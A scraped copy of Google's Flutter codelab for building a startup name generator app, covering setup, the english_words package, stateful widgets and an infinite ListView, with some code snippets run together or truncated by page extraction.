In part 2 of this codelab, you'll add interactivity, modify the app's theme, and add the ability to navigate to a new page (called a route in Flutter).
You'll implement a simple mobile app that generates proposed names for a startup company. The user can select and unselect names, saving the best ones. The code lazily generates 10 names at a time. As the user scrolls, new batches of names are generated. The user can scroll forever with new names being continually generated.
The following animated GIF shows how the app works at the completion of part:
You need two pieces of software—the Flutter SDK and an editor. (The codelab assumes that you're using Android Studio, but you can use your preferred editor.)
You can run the codelab by using any of the following devices:
If you want to compile your app to run on the web, you must enable this feature (which is currently in beta). To enable web support, use the following instructions:
$ flutter channel beta $ flutter upgrade $ flutter config --enable-web
You need only run the
config command once. After enabling web support, every Flutter app you create also compiles for the web. In your IDE under the devices pulldown, or at the command line using
flutter devices, you should now see Chrome and Web server listed.. For more information, see Building a web application with Flutter and Write your first Flutter app on the web.
Create a simple, templated Flutter app by using the instructions in Create the app. Enter startup_namer (instead of myapp) as the project name. You'll modify the starter app to create the finished app.
You'll mostly edit
lib/main.dart, where the Dart code lives.
Replace the contents of
lib/main.dart.
Delete all of the code from
lib/main.dart and replace it with the following code, which displays "Hello World" in the center of the screen.: const Text('Hello World'), ), ), ); } }
Run the app. You should see either Android or iOS output, depending on your device.
Observations
=>) notation. Use arrow notation for one-line functions or methods.
StatelessWidget, which makes the app itself a widget. In Flutter, almost everything is a widget, including alignment, padding, and layout.
Scaffoldwidget, from the Material library, provides a default app bar, a title, and a body property that holds the widget tree for the home screen. The widget subtree can be quite complex.
buildmethod that describes how to display the widget in terms of other, lower-level widgets.
Centerwidget containing a
Textchild widget. The
Centerwidget aligns its widget subtree to the center of the screen.
In this step, you'll start using an open-source package named
english_words, which contains a few thousand of the most-used English words, plus some utility functions.
You can find the
english_words package, as well as many other open-source packages, at pub.dev.
The pubspec file manages the assets for a Flutter app. In
pubspec.yaml, append
english_words: ^3.1.0 (
english_words 3.1.0 or higher) to the dependencies list:
dependencies: flutter: sdk: flutter cupertino_icons: ^0.1.2 english_words: ^3.1.0 # add this line
While viewing the pubspec in Android Studio's editor view, click Packages get. This pulls the package into your project. You should see the following in the console:
flutter packages get Running "flutter packages get" in startup_namer... Process finished with exit code 0
In
lib/main.dart, import the new package:
import 'package:flutter/material.dart'; import 'package:english_words/english_words.dart'; // Add this line.:flutter/material.dart'; import 'package:english_words/english_words.dart'; void main() => runApp(MyApp()); class MyApp extends StatelessWidget { @override Widget build(BuildContext context) { final wordPair = WordPair.random(); // Add this line. return MaterialApp( title: 'Welcome to Flutter', home: Scaffold( appBar: AppBar( title: Text('Welcome to Flutter'), ), body: Center( //child: Text('Hello World'), // Replace this text... child: Text(wordPair.asPascalCase), // With this text. ), ), ); } }
If the app is running, click Flutter.
Stateless widgets are immutable, meaning that their properties can't change—all values are final.
Stateful widgets maintain state that might change during the lifetime of the widget. Implementing a stateful widget requires at least two classes: 1) a
StatefulWidget that creates an instance of a
State class. The
StatefulWidget object is, itself, immutable, but the
State object persists over the lifetime of the widget.
In this step, you'll add a stateful widget,
RandomWords, which creates its
State class,
RandomWordsState. You'll then use
RandomWords as a child inside the existing
MyApp stateless widget.
Create a
minimal state class. It can go anywhere in the file outside of
MyApp, but the solution places it at the bottom of the file. Add the following text:
class RandomWordsState extends State<RandomWords> { // TODO Add build method }
Notice the declaration
State<RandomWords>. This indicates that you're using the generic
State class specialized for use with
RandomWords. Most of the app's logic and state resides here—it maintains the state for the
RandomWords widget. This class saves the list besides to
RandomWordsState.
Add the
build() method to
RandomWordsState, as shown here:
class RandomWordsState extends State<RandomWords> { @override // Add from this line ... Widget build(BuildContext context) { final WordPair wordPair = WordPair.random(); return Text(wordPair.asPascalCase); } // ... to this line. }
Remove the word-generation code from
MyApp by making the following changes:
class MyApp extends StatelessWidget { @override Widget build(BuildContext context) { final WordPair wordPair = WordPair.random(); // Delete this line. return MaterialApp( title: 'Welcome to Flutter', home: Scaffold( appBar: AppBar( title: Text('Welcome to Flutter'), ), body: Center( //child: Text(wordPair.asPascalCase), // Change this line a
_suggestions list to the
RandomWordsState class for saving suggested word pairings. Also, add a
_biggerFont variable for making the font size larger.
class RandomWordsState extends State<RandomWords> { // Add the next two lines. final List<WordPair> _suggestions = <WordPair>[]; final TextStyle _biggerFont = const TextStyle(fontSize: 18); ... }, once for every suggested word pairing. This model allows the suggestion list to grow infinitely as the user scrolls.
Add the entire
_buildSuggestions function to the
RandomWordsState class (delete the comments, if you prefer):
Widget _buildSuggestions() { return ListView.builder( padding: const EdgeInsets.all(16), //: (BuildContext _context, int i) { // Add a one-pixel-high divider widget before each row // in the List int. That function displays each new pair in a
ListTile, which allows you to make the rows more attractive in part 2.
Add a
_buildRow function to
RandomWordsState:
Widget _buildRow(WordPair pair) { return ListTile( title: Text( pair.asPascalCase, style: _biggerFont, ), ); }
Update the
build method for
RandomWordsState to use
_buildSuggestions(), rather than directly calling the word-generation library. (
Scaffold implements the basic Material Design visual layout.)
@override Widget build(BuildContext context) { //final wordPair = WordPair.random(); // Delete these... //return Text(wordPair.asPascalCase); // ... two lines. return Scaffold ( // Add from here... appBar: AppBar( title: Text('Startup Name Generator'), ), body: _buildSuggestions(), ); // ... to here. }
Update the
build method for
MyApp, changing the title, and changing the home property to a
RandomWords widget.
@override Widget build(BuildContext context) { return MaterialApp( title: 'Startup Name Generator', home: RandomWords(), ); }
Restart the app. You should see a list of word pairings no matter how far you scroll.
Problems?
If your app isn't running correctly, you can use the code at the following link to get back on track.
You have completed part 1 of this codelab! If you'd like to extend this app, proceed to part 2, where you will modify the app as follows:
When part 2 is completed, the app will look like this:
Learn more about the Flutter SDK with the following resources:
Other resources include the following:
Please reach out to us at our mailing list. We'd love to hear from you!
|
https://codelabs.developers.google.com/codelabs/first-flutter-app-pt1/index.html?index=..%2F..flutterlive
|
CC-MAIN-2020-10
|
refinedweb
| 1,308
| 58.79
|
I am having trouble figuring out what I am doing. If anyone can help me it would be appreciated. Here are the requirements:
Write a Java program that computes the distance between two points on a number plane (of x and y). In the server class, define the overloaded methods that computes distances of 1) two integer coordinates, 2) two real number coordinates, 3) two whole number coordinates defined as two Point objects, and 4) an integer coordinates and the origin of the number plane.
Here is the code I have so far but I don't think I am doing it right.
//Start Code
import java.util.Random;
public class Distance
{
public static void main (String[] args) {
int x1, y1, x2, y2;
double dist;
final int num;
Random generator = new Random();
x1 = generator.nextInt();
x2 = generator.nextInt();
y1 = generator.nextInt();
y2 = generator.nextInt();
dist = Math.sqrt(Math.pow(x1 - x2, 2) +
Math.pow(y1 - y2, 2));
//Integer
System.out.println("The distance between (" + x1 +
"," + y1 + ") and (" + x2 + "," +
y2 + ") is " + (int)dist);
//Real
System.out.println("The distance between (" + x1 +
"," + y1 + ") and (" + x2 + "," +
y2 + ") is " + (double)dist);
}
}
//End Code
Instead of casting the result into an int or double, it says that you should overload the methods, that means that you would have something like:
Code:
public int distance(int x, int y) {
//code
}
public double distance(double x, double y) {
//code
}
As with the Point objects, you could define a point simply as having an x and y coordinate, and would calculate the distance using the same method, but having a new method which receives a Point object instead of variables:
Code:
public double distance(Point p) {
//code
You can also overload these to return double or int
public int distance(int x, int y) {
//code
}
public double distance(double x, double y) {
//code
}
public double distance(Point p) {
//code
Forum Rules
Development Centers
-- Android Development Center
-- Cloud Development Project Center
-- HTML5 Development Center
-- Windows Mobile Development Center
|
http://forums.devx.com/showthread.php?147362-locate-proxy-info-for-a-url&goto=nextnewest
|
CC-MAIN-2016-44
|
refinedweb
| 329
| 51.07
|
Linked List in Python- Append, Index, Insert, and Pop functions. Not sure with code/errors
This assignment asks us to implement the append, insert, index and pop methods for an unordered linked-list. (What I have so far)
def main(): class Node: def __init__(self, data): self.data = data self.next_node = None class LinkedList: def __init__(self): self.head = None self.tail = None def AppendNode(self, data): new_node = Node(data) if self.head == None: self.head = new_node if self.tail != None: self.tail.next = new_node self.tail = new_node def PrintList( self ): node = self.head while node != None: print (node.data) node = node.next def PopNode( self, index ): prev = None node = self.head i = 0 while ( node != None ) and ( i < index ): prev = node node = node.next i += 1 if prev == None: self.head = node.next else: prev.next = node.next list = LinkedList() list.AppendNode(1) list.AppendNode(2) list.AppendNode(3) list.AppendNode(4) list.PopNode(0) list.PrintList( )
The output so far:
2 3 4 Traceback (most recent call last): File "<pyshell#32>", line 1, in <module> main() File "<pyshell#31>", line 50, in main list.PrintList( ) File "<pyshell#31>", line 27, in PrintList node = node.next AttributeError: 'Node' object has no attribute 'next'
I'm not sure why i'm getting the errors, since the code is technically working. Also any input on the insert, and index functions would be greatly appreciated.
Answers
For insert and index methods you will need another Node attribute, because you'll need to keep track of which item is on what position. Let we call it position. Your Node class will now look like this:
class Node: def __init__(self, data, position = 0): self.data = data self.next_node = None self.position = position
Retrieving index value now is easy as:
def index(self,item): current = self.head while current != None: if current.data == item: return current.position else: current = current.next print ("item not present in list")
As for the list-altering methods, I would start with a simple add method which adds items to the leftmost position in the list:
def add(self,item): temp = Node(item) #create a new node with the `item` value temp.next = self.head #putting this new node as the first (leftmost) item in a list is a two-step process. First step is to point the new node to the old first (lefmost) value self.head = temp #and second is to set `LinkedList` `head` attribute to point at the new node. Done! current = self.head #now we need to correct position values of all items. We start by assigning `current` to the head of the list self.index_correct(current) #and we'll write helper `index_correct` method to do the actual work. current = self.head previous = None while current.position != self.size() - 1: previous = current current = current.next current.back = previous self.tail = current
What shall the index_correct method do? Just one thing - to traverse the list in order to correct index position of items, when we add new items (for example: add, insert etc.), or remove them (remove, pop, etc.). So here's what it should look like:
def index_correct(self, value): position = 0 while value != None: value.position = position position += 1 value = value.next
It is plain simple. Now, let's implement insert method, as you requested:
def insert(self,item,position): if position == 0: self.add(item) elif position > self.size(): print("position index out of range") elif position == self.size(): self.AppendNode(item) else: temp = Node(item, position) current = self.head previous = None while current.position != position: previous = current current = current.next previous.next = temp temp.next = current temp.back = previous current.back = temp current = self.head self.index_correct(current)
def insert(self,item,position): if position==0: self.add(item) elif position>self.size(): print("Position index is out of range") elif position==self.size(): self.append(item) else: temp=Node.Node(item,position) current=self.head previous=None current_position=0 while current_position!=position: previous=current current=current.next current_position+=1 previous.next=temp temp.next=current
Below is the implementation that I could come up with (tested and working). It seems to be an old post, but I couldn't find the complete solution for this anywhere, so posting it here.
# add -- O(1) # size -- O(1) & O(n) # append -- O(1) & O(n) # search -- O(n) # remove -- O(n) # index -- O(n) # insert -- O(n) # pop -- O(n) # can be O(1) if we use doubly linked list # pop(k) -- O(k) class Node: def __init__(self, initdata): self.data = initdata self.next = None def getData(self): return self.data def getNext(self): return self.next def setNext(self, newnext): self.next = newnext class UnorderedList: def __init__(self): self.head = None self.tail = None self.length = 0 def isEmpty(self): return self.head is None def add(self, item): temp = Node(item) temp.setNext(self.head) self.head = temp if self.tail is None: self.tail = temp self.length += 1 def ssize(self): # This is O(n) current = self.head count = 0 while current is not None: count += 1 current = current.getNext() return count def size(self): # This is O(1) return self.length def search(self, item): current = self.head found = False while current is not None and not found: if current.getData() == item: found = True else: current = current.getNext() return found def remove(self,item): current = self.head previous = None found = False while current is not None and not found: if current.getData() == item: found = True else: previous = current current = current.getNext() if previous == None: # The item is the 1st item self.head = current.getNext() else: if current.getNext() is None: self.tail = previous # in case the current tail is removed previous.setNext(current.getNext()) self.length -= 1 def __str__(self): current = self.head string = '[' while current is not None: string += str(current.getData()) if current.getNext() is not None: string += ', ' current = current.getNext() string += ']' return string def sappend(self, item): # This is O(n) time complexity current = self.head if current: while current.getNext() is not None: current = current.getNext() current.setNext(Node(item)) else: self.head = Node(item) def append(self, item): # This is O(1) time complexity temp = Node(item) last = self.tail if last: last.setNext(temp) else: self.head = temp self.tail = temp self.length += 1 def insert(self, index, item): temp = Node(item) current = self.head previous = None count = 0 found = False if index > self.length-1: raise IndexError('List Index Out Of Range') while current is not None and not found: if count == index: found = True else: previous = current current = current.getNext() count += 1 if previous is None: temp.setNext(self.head) self.head = temp else: temp.setNext(current) previous.setNext(temp) self.length += 1 def index(self, item): pos = 0 current = self.head found = False while current is not None and not found: if current.getData() == item: found = True else: current = current.getNext() pos += 1 if not found: raise ValueError('Value not present in the List') return pos def pop(self, index=None): if index is None: index = self.length-1 if index > self.length-1: raise IndexError('List Index Out Of Range') current = self.head previous = None found = False if current: count = 0 while current.getNext() is not None and not found: if count == index: found = True else: previous = current current = current.getNext() count += 1 if previous is None: self.head = current.getNext() if current.getNext() is None: self.tail = current.getNext() else: self.tail = previous previous.setNext(current.getNext()) self.length -= 1 return current.getData()
Notice that in the Node class you defined the "next" field as "next_node". Therefore the interpreter doesn't know "next". So, instead of node.next it should be node.next_node
Need Your Help
multipeer connectivity test on iphone and a simulator simultaneously
ios objective-c cocoa-touch multipeer-connectivityHello I was searching in all topics of the forum about how can i test an app which uses multipeer connectivity framework. Can someone tell me how can i test an app by using an iPhone device and a
|
http://www.brokencontrollers.com/faq/22284578.shtml
|
CC-MAIN-2019-35
|
refinedweb
| 1,343
| 63.25
|
Nomad has support for namespaces, which allow jobs and their associated objects to be segmented from each other and other users of the cluster.
Nomad places all jobs and their derived objects into namespaces. These include jobs, allocations, deployments, and evaluations.
Nomad does not namespace objects that are shared across multiple namespaces. This includes nodes, ACL policies, Sentinel policies, and quota specifications.
In this guide, you'll create and manage a namespace with the CLI. After creating the namespace, you then learn how to deploy and manage a job within that namespace. Finally, you practice securing the namespace.
»Create and view a namespace
You can manage namespaces with the
nomad namespace subcommand.
Create the namespace of a cluster.
$ nomad namespace apply -description "QA instances of webservers" web-qa Successfully applied namespace "web-qa"!
List the namespaces of a cluster.
$ nomad namespace list Name Description default Default shared namespace api-prod Production instances of backend API servers api-qa QA instances of backend API servers web-prod Production instances of webservers web-qa QA instances of webservers
»Run a job in a namespace
To run a job in a specific namespace,"] # ... }
»Use namespaces in the CLI and UI
»Nomad CLI
When using commands that operate on objects that are namespaced, the namespace
can be specified either with the flag
-namespace or read from the
NOMAD_NAMESPACE environment variable.
Request job status using the
-namespace flag.
$ nomad job status -namespace=web-qa ID Type Priority Status Submit Date rails-www service 50 running 09/17/17 19:17:46 UTC
Export the
NOMAD_NAMESPACE environment variable.
$ export NOMAD_NAMESPACE=web-qa
Use the exported environment variable to request job status.
$ nomad job status ID Type Priority Status Submit Date rails-www service 50 running 09/17/17 19:17:46 UTC
»Nomad UI
The Nomad UI provides a drop-down menu to allow operators to select the namespace that they would like to control. The drop-down will appear once there are namespaces defined. It is located in the top section of the left-hand column of the interface under the "WORKLOAD" label.
»Secure a namespace
Access to namespaces can be restricted using ACLs. As an example, you could create an ACL policy that allows full access to the QA environment for the web namespaces but restrict the production access by creating the following policy:
# Allow read only access to the production namespace namespace "web-prod" { policy = "read" } # Allow writing to the QA namespace namespace "web-qa" { policy = "write" }
»Learn more about namespaces
For specific details about working with namespaces, consult the namespace commands and HTTP API documentation.
|
https://learn.hashicorp.com/tutorials/nomad/namespaces
|
CC-MAIN-2022-21
|
refinedweb
| 433
| 52.7
|
.
With what we've learned and a little bit of HTML,
view.cgi is easy:
tasks;
<img>tag to display the image (by setting the
srcattribute to chart.cgi);
The script is mostly plain HTML or code we've already seen, except for the last item, displaying a link to edit each task. This requires a loop:
# display the tasks as links:
for row in range(len(tasks)):
print '<li><a href="controller.cgi?action=edit&row=%i">%s</a>' \
% (row, tasks[row]["label"])
print ' [<a href="controller.cgi?action=delete&row=%i">delete<a>]</li>' \
% row
Make sure that the web server has rights to read and write
model.shelf, and load
view.cgi in your
browser. If you run this cgi script now, you will see a broken image
and the list of tasks. Next we will work on the chart.
To create the image, we'll use the original gannt chart code, with three major changes. The new version will
now', '
tasks', and '
titles' out of our shelf;
content-typeto
image/jpeg;
The first two changes are simple; the third is trickier. In theory,
we'd just save the piddle canvas to
sys.stdout, but there
are two problems with this approach.
The first problem is that
piddlePIL doesn't allow
saving images to file objects. Since it comes with full source,
however, we can fix it ourselves. Search in
piddlePIL.py
for the
save method. You'll see the problem. A couple
lines down, there's a bit of code that says:
if hasattr(file, 'write'): raise 'fileobj not implemented for piddlePIL'
Replace that with the following:
if hasattr(file, 'write'): self._image.save(file, format) return
Now, displaying the image on the web is easy. Here's the code, from
the bottom part of
chart.cgi:
print "content-type: image/jpeg" print import sys c.save(file=sys.stdout, format="jpeg")
The second problem only happens under Windows: the output gets
corrupted because
stdout is not in binary mode by
default. The fix is arcane, but concise:
import os, sys if sys.platform=="win32": import msvcrt msvcrt.setmode(sys.__stdin__.fileno(), os.O_BINARY) msvcrt.setmode(sys.__stdout__.fileno(), os.O_BINARY)
Place this before the content-type line and
chart.cgi
should have no problem displaying the image.
The controller is in charge of managing our data. Essentially, it does four things:
By default,
controller.cgi shows the "add" form. A
parameter called
action tells it to do something else. We
can pass
action, either as part of a query string (data
following the question mark in a URL) or via a form submission. The
cgi module can handle either method through the
FieldStorage class.
FieldStorage can be
treated almost like a dictionary, although it doesn't implement
every dictionary method. For simple cases like this, it returns values
as
cgi.MiniFieldStorage objects. The following code
shows
FieldStorage in action:
import cgi request = cgi.FieldStorage() action = "add" # by default if request.has_key("action"): action = request["action"].value
In
controller.cgi, a set of if/elif blocks looks at
the
action parameter and calls the appropriate
function. In a sense, the controller is several CGI scripts rolled
into one. We could have broken these into separate files, but I prefer
to keep related logic together.
Some of the available actions don't return a page to the browser
but, instead, redirect it to another page. In our case,
saveTask and
deleteTask both call
backToView, which returns a
Location header
rather than a content type. The following line sends the browser back
to the view page:
print "Location: view.cgi"
The rest of
controller.cgi, including the code to save
and delete tasks, is pretty straightforward. Consult the source for details.
That's it for this whirlwind tour of the gantt chart CGI application. To recap, we've seen how to store and retrieve data from a python shelf, communicate with the browser through CGI, and use piddlePIL to generate graphics in real time on the Web.
|
http://www.linuxdevcenter.com/lpt/a/969
|
CC-MAIN-2014-42
|
refinedweb
| 669
| 68.26
|
There is a massive and growing industry trend to use a set of principles called the SOLID principles. If you haven't come across these, go and read up on them.
These principles were put together by Robert C. Martin (aka Uncle Bob) and popularized in his book called Agile PPP.
Now, Uncle Bob isn't one for being shy or self-deprecating. His presentation style is in your face. This is what makes him immensely entertaining.
It is also what makes his audience believe his philosophy is black-and-white without a hint of pragmatism. They believe the SOLID principles should be used EVERYWHERE. That the abstraction promoted by SOLID is a noble goal. That the SOLID principles are the pinnacle of Object Oriented Design.
They are wrong.
They have either not read, or mis-read his Agile PPP book. They have not read the numerous insights Uncle Bob has written on the subject. So let me help by quoting Uncle Bob. If these are a surprise to you, PLEASE temper your love of SOLID and go read up on Primitive Obsession.
I quite agree that a dogmatic or religious application of the SOLID principles is neither realistic nor beneficial. If you had read through any of the articles and/or books I’ve written on these principles over the last 15 years, you’d have found that I don’t recommend the religious or dogmatic approach you blamed me for. In short, you jumped to a erroneous conclusion about me, and about the principles, because you weren’t familiar with the material.
An axis of change is an axis of change only if the changes occur. It is not wise to apply SRP - or any other principle, for that matter - if there is no symptom.
Clearly, we want to limit the application of OCP to changes that are likely.
Page 129, Agile Principles, Patterns and Practices in C#
A recent paper by Microsoft research has discovered a concurrency bug in the .Net JIT. They used the F# theorem prover to analyze the JIT il->x86 transformations which were previously thought to comply with the .Net memory model. These bugs show that writing correct concurrent (multi-threaded) code is hard - and in a multi-core world we need to find a way to provably write correct code.
"This discovery means that the current CLR JIT
compiler for the x86 platform is not correct; it will be fixed in the
future by strictly emitting locked instructions for all volatile stores"
-
via LtU
Recently,)
The C# team has been fairly candid in the features they are considering for C# v4. You just have to look hard enough. We'll know what they decide on soon enough as the PDC is just around the corner. Declarative side-effect free methods, Contra/covariance of arguments/return values, Declarative dynamic dispatch (VB-style object access). These all sound great. Perhaps I can add a few suggestions of my own not just for C# but for .Net in general:
A few ideas for .Net vnext:
As for Visual Studio:
In the System.Data namespace, there's a ConnectionState enumeration. This has values like Open, Closed, Connecting, Fetching to represent the state of a database connection.
I pondered on whether a connection which is "Fetching" is also "Open". It turns out that ConnectionState is declared with the FlagsAttribute - The mono DocComment for this enumeration says it best:
/// This enumeration has a FlagsAttribute that allows a bitwise combination of its member values.
Great - so now I can do something like:
if((connection.State & ConectionState.Open)==ConnectionState.Open) ...
Wrong! Further down the MSDN documentation for ConnectionState, tucked away in the Remarks section is the following paragraph:
The values in this enumeration are not designed to be used as a set of flags.
Great. So the question is, which of the database providers follow the FlagsAttribute, and which follow the documentation comment? Does SQL Server treat ConnectionState as flags? Does the managed Oracle provider? Does Oracle's ODP.Net provider treat it as flags? etc.
Certainly there are many people who treat it like flags. There are equally many people who ignore it.
I think I know this history behind this debacle - if anyone knows for sure, I'd like to know. If you actually look at the ConnectionState definition, you will see that ConnectionState.Closed has a value of 0. This flouts the .Net Design Guidelines and I expect it to be raised by FxCop/CodeAnalysis. Go ahead and read that link if you're not sure why bitwise comparison with 0 is a bad idea. This means there are a lot of bugs about due to the use of Bitwise comparison of ConnectionState.Closed. So I suspect that the System.Data team realized they'd made a mistake and was unable to retroactively remove the FlagsAttribute - so their approach was to document the issue in an obscure remark.
Back in 2000 when the CLR was first shown it's generational garbage collector was fairly cutting edge. But it's weaknesses show it's age - and it desperately needs updating.
Here's an example of just one of the ways the current GC (.Net 3.5) doesn't work:
A .Net process with a number of threads has just saved a large amount of data to a database. All of these threads could potentially allocate memory which causes a GC collection. However, saving the data to the database is a fairly long operation and thus the data gets promoted into the GC's generation 2.
After saving the data, the .Net process waits until it's instructed to do some more work. However, because a large amount of data has been promoted into Gen2, it just sits there until sufficient new allocations cause a Gen2 GC collection. The problem is that if no new work happens for a long time (hours), these unreachable objects take up (virtual) address space. Yes, NT will swap it out to disk as virtual memory. But it's still there.
The GC really needs a timer, which periodically checks if no GCs have happened recently and the process has consumed very little CPU, then perform a Gen2 collection.
Aside: Does anyone know how to trigger a GC.Collect() on a process from a different process, or from inside WinDbg? One of the problems with WinDbg/SOS is figuring out just which objects are reachable - you would have to !gcroot every possible object just to figure out which are the reachable ones.
--------------------------ee7]---------------------------OK ---------------------------
Why does Microsoft insist on making my life difficult?
I'm doing a lot of porting and refactoring at the moment. I've come to the conclusion that porting from a dynamically typed language to a statically typed language is an order of magnitude more difficult than doing the reverse.
Refactoring is an interesting game. There are some very easy refactorings - especially with the toolsets available to us nowadays. However, there are some extremely difficult refactorings. I've found the most difficult to refactor methods have one or more of these 3 aspects:
1) It has long methods (>40 lines)2) The method shares a variable for different things3) Loops do more than 1 thing1) causes 2) - so eliminating 1) means that 2) doesn't happen.
I sure wish the NextBigLanguage has an upper bound on the lines/method it can parse.
A lot of my development is done with Code Smells. Whether I'm working on my own code or refactoring someone elses code, if I see some code and it smells funny, then I investigate further.
Recently I've come to realize there's a code smell which we can blame Microsoft (Anders) for! C# Code Regions.
Back in the early days of .Net (ie 2000-2003), I used to moderately region my code. But since reading Martin Fowler's seminal Refactoring book where the concept of Code Smells was introduced, I found that I didn't need C# Regions.
So why are regions a Code Smell?
There are two types of regioning I've seen in code. Regions that group methods, properties, member variables, constructors etc together, and those which collapse a block of code. I'll deal with each separately.
Using Regions to group members.
In many companies, its commonplace (and even enforced practice) to group similar class members together and place a region block around them. I've even seen this as a coding doctrine inside Microsoft. The problem is that Visual Studio already has a facility to do this automatically. And it's been around in VS since it was called VJ++ and before that in VC. It's called the Class View window, accessed with the shift-ctrl-C shortcut. So why anyone would care about building a class "DOM" into their code using Regions, rather than rely on the Class View window I have no idea. Perhaps they're using Notepad?
Using Regions to hide blocks within a method.
This is when it gets really nasty. Code Smell, but having region after region after region is a sure-fire way of telling you the method is too long.
So, please, can we all resolve to stop using Regions?
Interestingly, there are many features that Java has started copying from C# - but regions were not one of those. Perhaps in C# v4 Microsoft can right the wrong and deprecate regions?
If you're making a SOAP request (in this case with the SOAP toolkit), and you get:
"WSDLReader:Loading of the WSDL file failed HRESULT=0x80070057: The parameter is incorrect."
during the MSSoapInit() call, check that you haven't added a cache-control:no-cache custom header to IIS, or that HttpExpires isn't set to zero days.
A couple of months ago I came across a very clever Sudoku solver written by Peter Norvig. Peter had written the solver using Python. The solver was special as it solved by constraint propagation using list comprehensions and generator expressions making it extremely fast and very memory frugal. It turns out that the new LINQ feature of C# v3 is basically list comprehensions and generator expressions by another name.
Brendan Eich, the creator of JavaScript had ported the original Python implementation to JavaScript and I thought it would be a good idea to try to port it to C# v3. You can check out the code here.
I always had a vague plan to wrap the solver in a Silverlight front-end for added WOW factor, but it never really materialized. Fast forward two months and David Anson posts a Silverlight-based Sudoku game on his blog. This gave me the perfect excuse to integrate the LINQ-based solver into his codebase. I extended David's code to respond to the Escape key and complete the board with the first solution found. You can play with it online here, or download the code here. Have fun!
To solve a game, give the Silverlight board the input focus and hit the escape key.
So I'm sat here watching the Mix07 keynote, 45 minutes after Ray Ozzie first got to the stage. I download the Silverlight Beta for Mac and install it.
Firefox has crashed 4 times while trying to view the Silverlight demos on microsoft.com/silverlight. This is getting really frustrating trying to review the new features.
As has been blogged all over the place, WPF/E has been renamed Silverlight (Note: lower case 'L').
Some people say there's more to come at MIX07. Well, I think I've discovered what the secret is. It's hidden inside of the Silverlight promo video. Silverlight is written in Java! Don't believe me? Take a look at a frame grab from the promo video, clearly showing Silverlight's use of SAX, the javax namespace and use of Java API's like vector.addElement.
Javascript.
In this video, Peter Hallam, one of the original C# designers talks about a new C# v3 feature, but also says that WinForms was the original consumer of the C# language.
This totally contradicts my understanding. I thought that ASP.Net (XSP) was the original team using C# and that WinForms (WFC as it was) was only ported to C# from Java over the winter of 1999/2000 by Chris Anderson.
Am I wrong?
|
http://aspadvice.com/blogs/rbirkby/default.aspx
|
CC-MAIN-2015-14
|
refinedweb
| 2,054
| 65.42
|
Read and write text files with Visual Basic .NET
Takeaway: Reading and writing text files is an essential task in any programming language. Follow this step-by-step approach to working with text files in VB .NET using the System.IO namespace.
Years ago, when I first learned to program in BASIC, I came across a sample program for reading a text file. The OPEN command with the file number looked quite confusing, so I never wrote the program. Later, when I learned Visual Basic, I was shocked to see that the same file operations existed in VB. The basic file-handling commands had not changed; just a few more features had been added.
With Visual Basic .NET, Microsoft introduced a new, object-oriented method for working with files. The System.IO namespace in the .NET framework provides several classes for working with text files, binary files, directories, and byte streams. I will look specifically at working with text files using classes from the System.IO namespace.
Basic methods
Before we jump into working with text files, we need to create a new file or open an existing one. That requires the System.IO.File class. This class contains methods for many common file operations, including copying, deleting, file attribute manipulation, and file existence. For our text file work, we will use the CreateText and OpenText methods.
CreateText
True to its name, the CreateText method creates a text file and returns a System.IO.StreamWriter object. With the StreamWriter object, you can then write to the file. The following code demonstrates how to create a text file:
Dim oFile as System.IO.File
Dim oWrite as System.IO.StreamWriter
oWrite = oFile.CreateText(“C:\sample.txt”)
OpenText.txt”)
Writing to a text file
The methods in the System.IO.StreamWriter class for writing to the text file are Write and WriteLine. The difference between these methods is that the WriteLine method appends a newline character at the end of the line while the Write method does not. Both of these methods are overloaded to write various data types and to write formatted text to the file. The following example demonstrates how to use the WriteLine method:
oWrite.WriteLine(“Write a line to the file”)
oWrite.WriteLine() ‘Write a blank line to the file
Formatting the output
The Write and WriteLine methods both support formatting of text during output. The ability to format the output has been significantly improved over previous versions of Visual Basic. There are several overloaded methods for producing formatted text. Let’s look at one of these methods:
oWrite.WriteLine(“{0,10}{1,10}{2,25}”, “Date”, “Time”, “Price”)
oWrite.WriteLine(“{0,10:dd MMMM}{0,10:hh:mm tt}{1,25:C}”, Now(), 13455.33)
oWrite.Close()
The overloaded method used in these examples accepts a string to be formatted and then a parameter array of values to be used in the formatted string. Let’s look at both lines more carefully.
The first line writes a header for our report. Notice the first string in this line is {0,10}{1,10}{2,25}. Each curly brace set consists of two numbers. The first number is the index of the item to be displayed in the parameter array. (Notice that the parameter array is zero based.) The second number represents the size of the field in which the parameter will be printed. Alignment of the field can also be defined; positive values are left aligned and negative values are right aligned.
The second line demonstrates how to format values of various data types. The first field is defined as {0,10:dd MMMM}. This will output today’s date (retrieved using the Now() function) in the format 02 July. The second field will output the current time formatted as 02:15 PM. The third field will format the value 13455.33 into the currency format as defined on the local machine. So if the local machine were set for U.S. Dollars, the value would be formatted as $13,455.33.
Listing A shows the output of our sample code.
Reading from a text file
The System.IO.StreamReader class supports several methods for reading text files and offers a way of determining whether you are at the end of the file that's different from previous versions of Visual Basic.
Line-by-line
Reading a text file line-by-line is straightforward. We can read each line with a ReadLine method. To determine whether we have reached the end of the file, we call the Peek method of the StreamReader object. The Peek method reads the next character in the file without changing the place that we are currently reading. If we have reached the end of the file, Peek returns -1. Listing B provides an example for reading a file line-by-line until the end of the file.
An entire file
You can also read an entire text file from the current position to the end of the file by using the ReadToEnd method, as shown in the following code snippet:
Dim EntireFile as String
oRead = oFile.OpenText(“C:\sample.txt”)
EntireFile = oRead.ReadToEnd()
This example reads the file into the variable EntireFile. Since reading an entire file can mean reading a large amount of data, be sure that the string can handle that much data.
One character at a time
If you need to read the file a character at a time, you can use the Read method. This method returns the integer character value of each character read. Listing C demonstrates how to use the Read method.
Tap into the power
We've barely scratched the surface of the new file functionality included in .NET, but at least you have an idea of the power now available in the latest edition of Visual Basic .The abilities of the classes in the System.IO namespace are quite useful, but if you want to continue to use the traditional Visual Basic file operations, those are still supported.
More .NET
What types of .NET content would you like to see? Post your suggestions below or e-mail us with your suggestions.
Print/View all Posts Comments on this article
|
http://articles.techrepublic.com.com/5100-10878_11-1045309.html
|
crawl-002
|
refinedweb
| 1,035
| 75.4
|
